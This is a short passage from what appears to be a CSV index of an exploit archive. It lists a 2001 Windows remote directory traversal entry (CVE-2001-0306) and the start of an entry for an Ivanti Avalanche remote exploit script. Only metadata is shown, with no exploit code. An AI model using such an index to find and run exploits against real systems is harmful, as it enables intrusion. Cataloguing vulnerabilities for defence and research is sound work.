Traversal",2001-02-16,slipy,remote,windows,,2001-02-16,2012-08-18,1,CVE-2001-0306;OSVDB-7706,,,,,https://www.securityfocus.com/bid/2386/info +51699,exploits/windows/remote/51699.py,"Ivanti Avalanche